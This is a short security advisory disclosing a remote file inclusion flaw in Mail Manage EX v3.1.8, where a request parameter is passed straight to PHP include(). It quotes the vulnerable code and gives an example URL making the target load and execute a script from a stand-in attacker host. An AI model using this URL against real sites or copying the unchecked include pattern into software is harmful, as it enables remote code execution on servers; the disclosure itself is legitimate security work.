Description: PHP Include Exploit in Mail Manage EX v3.1.8
Compromise: a malicious PHP script from an external host may be included and
executed.
Vulnerable Systems: all system using mmex.php v3.1.8 and maybe lower (not
tested).
Details:
The PHP Include exploit exist in de folowing code,

mmex.php--SNIP----->
#===========================================================
# Register Globals
#===========================================================

$Settings = $_REQUEST['Settings'];
$Refresh = $_REQUEST['Refresh'];
$FormRecipient = $_REQUEST['Recipient'];
$EMAIL[0] = $_REQUEST['email'];
$EMAIL[1] = $_REQUEST['Email'];
$EMAIL[2] = $_REQUEST['E_mail'];
$EMAIL[3] = $_REQUEST['e_mail'];
$EMAIL[4] = $_REQUEST['email_address'];
$EMAIL[5] = $_REQUEST['Email_Address'];
$EMAIL[6] = $_REQUEST['Email_address'];

#===========================================================
# CHECK SETTINGS & FORM RECIPIENT
#===========================================================
if(!$Settings)
exit ("<b>No settings were found for this form.</b>");

$Include = @include($Settings);
if (!$Include)
exit ("<b>Incorrect settings filename in your form or specified file does
not exist.</b>");
mmex.php---EOF----->

"$Settings" can be used to Include malicious PHP code.

How to exploit this bug?

http://www.target.com/mail/mmex.php?Setings=http://www.h4x0r.b0x/malicio
us.p
hp

malicious.php is executed by the target.

Solution:
No solution provided.
Gregg Kenneth Jewell of "Mail Manage EX" is informed.

Greetings,

Jan van de Rijt aka The Warlock.
http://members.home.nl/thewarlock/

[ reply ]